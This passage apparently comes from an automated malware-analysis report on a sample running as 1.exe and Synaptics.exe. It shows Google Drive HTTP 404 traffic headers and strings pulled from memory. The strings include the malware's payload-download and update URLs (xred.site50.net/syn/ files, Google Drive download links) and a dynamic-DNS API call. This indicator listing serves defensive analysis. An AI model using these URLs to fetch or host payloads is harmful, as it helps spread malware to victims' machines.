'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZvOTkauHlWm1dBpuMdT5Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AFEGbacIzpSAULCoPQkw8rQlP8j00jsK0afAf7paQz2DH7_4vaUPD3x2y83op_4BPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-JnKr9rVpi7N8UzYKecQyFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fjW79sMfd1HlUfT-MEXFhe4qPQ27GWsVwFOoxyb5FqGrulKmtpHxCkk2oCpEg4dMF5DRsOmMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Ct9D7YgvO5V7GKRak1rSAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7jhPuA0J95js8FDmgC7duCyXj-lWiC5Ip5lkvfsF-1xpoMkD_qoKNHuBipEvY4hPp3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uzHOJLaF6rlpMxcTIFlrSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_oTww3mIe1EfNf3TQ-8zcPJ3aQ-KG6Naed04EJUjPoAUj2AYR35vdqpJdmI4IVvGmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zUCoA0qSCHe1Z6UOQmmlMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7R4eBZR9LgN6RPwahPjRarpIy04VerY33x6bBj7utr5fwLWPsDOwOXsKcezHrN6eIEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CpRBI0bq7Eq7tAqm-ob1YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4UArBQRWaOSX10ZYVCB2aKb-ci0jVUSIxEGelZR2W-Iq6c3YNODJqUa2MBncSscMPVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j49NPYKZUvdIpdyOgMCfsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BZWX2EUNKVtqtFtH2E7OxWAs1XcLLQi69P1f3kPTgQXgw1y1AEIvS4919Fq05lVmDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Lu0ncRGZ_eoNCbHtbJfSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: ~$cache1.3.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629783
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978=
                              Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                              Source: Synaptics.exe, 00000003.00000002.1579357686.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goo
                              Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1579357686.00000000078D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/1
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                              Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/esMon
                              Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                              Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/a
                              Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ire-trusted-types-for
                              Source: Synaptics.exe, 00000003.00000002.1575813367.0000000004D5E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581174232.00000000084BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584993099.000000000D4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581398418.00000000089BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581615249.0000000008EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1582937666.000000000A8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1582242501.0000000009C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583276302.000000000B07E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584701542.000000000CE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581733226.000000000913E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584819657.000000000D0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583163277.000000000ADFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576171771.000000000525E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1575669367.0000000004ADE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1585107280.000000000D73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581967941.000000000963E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1580833395.0000000007D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584103128.000000000C1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583513029.000000000B57E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#b%
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#m
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%X
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(m
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(r
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)yt
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-BitnB
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Opt
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.n
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.g
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goo
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.orig
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.tr
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.user
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/imag
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2:18:
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3-eu
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7E?
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:0
